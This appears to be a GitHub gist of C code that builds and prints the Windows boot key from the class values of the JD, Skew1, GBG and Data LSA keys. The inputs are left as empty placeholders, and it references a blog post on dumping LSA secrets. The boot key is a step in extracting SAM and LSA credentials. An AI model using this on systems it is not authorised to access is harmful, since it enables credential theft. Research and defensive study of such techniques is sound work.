
@joelczk
Created July 10, 2024 09:51
C Code to extract boot key by printing out LSA hives (https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/)
#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)
/*
 * Decode a hex string into raw bytes, two characters per output byte.
 *
 * hexString: NUL-terminated text; strlen(hexString) / 2 bytes are produced,
 *            so a trailing odd character is ignored.
 * byteArray: destination buffer. No capacity is passed in, so the caller
 *            must guarantee room for strlen(hexString) / 2 bytes; an
 *            over-long input writes past the end of the buffer.
 *
 * The sscanf() result is not checked: a pair that fails to convert leaves
 * the corresponding output byte unmodified. Callers that take these strings
 * from outside should validate length and character set first.
 */
void hexStringToByteArray(const char* hexString, BYTE* byteArray) {
    const size_t byteCount = strlen(hexString) / 2;
    size_t idx = 0;

    while (idx < byteCount) {
        /* %2hhx reads at most two characters into one unsigned char. */
        sscanf(&hexString[idx * 2], "%2hhx", byteArray + idx);
        ++idx;
    }
}
/*
 * Write `length` bytes from byteArray to stdout as lowercase two-digit hex,
 * with no separators, followed by a single newline.
 */
void printByteArray(const BYTE* byteArray, size_t length) {
    const BYTE* cursor = byteArray;
    const BYTE* const end = byteArray + length;

    while (cursor != end) {
        printf("%02x", *cursor);
        ++cursor;
    }
    printf("\n");
}
/*
 * Reorder the BOOT_KEY_SIZE bytes of bootKey in place using a fixed table:
 * output byte i becomes input byte order[i].
 *
 * bootKey: buffer of at least BOOT_KEY_SIZE bytes, read and overwritten.
 */
void permuteBootKey(BYTE* bootKey) {
    static const int order[] = { 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 };
    BYTE snapshot[BOOT_KEY_SIZE];

    /* Work from a copy so earlier writes cannot disturb later reads. */
    memcpy(snapshot, bootKey, BOOT_KEY_SIZE);

    for (int dst = 0; dst < BOOT_KEY_SIZE; ++dst) {
        int src = order[dst];
        bootKey[dst] = snapshot[src];
    }
}
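/*
 * Return 1 when `hex` is a non-empty, even-length string of hexadecimal
 * digits that decodes to at most `maxBytes` bytes; return 0 otherwise.
 */
static int isUsableHexComponent(const char* hex, size_t maxBytes) {
    size_t len = strlen(hex);

    if (len == 0 || len % 2 != 0 || len / 2 > maxBytes) {
        return 0;
    }
    for (size_t i = 0; i < len; ++i) {
        char c = hex[i];
        int isDigit = (c >= '0' && c <= '9');
        int isLower = (c >= 'a' && c <= 'f');
        int isUpper = (c >= 'A' && c <= 'F');
        if (!isDigit && !isLower && !isUpper) {
            return 0;
        }
    }
    return 1;
}

/*
 * Assemble the boot key from four hex strings (JD, Skew1, GBG, Data, in that
 * order), apply the fixed byte permutation and print the result as hex.
 *
 * The four strings are empty placeholders in this listing and are meant to
 * be filled in before building (presumably with the class values of the
 * correspondingly named LSA keys -- confirm against the referenced article).
 *
 * Returns 0 on success, 1 when the inputs are missing, malformed, or do not
 * decode to exactly BOOT_KEY_SIZE bytes. The original wrote into the 16-byte
 * bootKey buffer without checking the decoded length (stack overflow for
 * over-long inputs) and printed uninitialized stack bytes when the inputs
 * were short or empty; both are rejected here.
 *
 * The printed value is secret key material: treat any terminal log or file
 * it is redirected to accordingly.
 */
int main() {
    char classValue_GBG[256];
    char classValue_Data[256];
    char classValue_JD[256];
    char classValue_Skew1[256];
    BYTE bootKey[BOOT_KEY_SIZE] = { 0 };
    size_t offset = 0;

    /* Bounded copies: a pasted value longer than the buffer is truncated
     * (and later rejected by the length check) instead of overflowing. */
    snprintf(classValue_GBG, sizeof classValue_GBG, "%s", "");
    snprintf(classValue_Data, sizeof classValue_Data, "%s", "");
    snprintf(classValue_JD, sizeof classValue_JD, "%s", "");
    snprintf(classValue_Skew1, sizeof classValue_Skew1, "%s", "");

    /* Concatenation order is significant: JD, Skew1, GBG, Data. */
    const char* components[] = { classValue_JD, classValue_Skew1, classValue_GBG, classValue_Data };
    const char* names[] = { "JD", "Skew1", "GBG", "Data" };

    for (size_t i = 0; i < sizeof components / sizeof components[0]; ++i) {
        /* Only accept a component that still fits in the remaining space. */
        if (!isUsableHexComponent(components[i], BOOT_KEY_SIZE - offset)) {
            fprintf(stderr, "Invalid or oversized hex value for %s\n", names[i]);
            return 1;
        }
        hexStringToByteArray(components[i], bootKey + offset);
        offset += strlen(components[i]) / 2;
    }

    if (offset != BOOT_KEY_SIZE) {
        fprintf(stderr, "Expected %d bytes of key material, got %zu\n", BOOT_KEY_SIZE, offset);
        return 1;
    }

    permuteBootKey(bootKey);
    printf("Boot key is: ");
    printByteArray(bootKey, BOOT_KEY_SIZE);
    return 0;
}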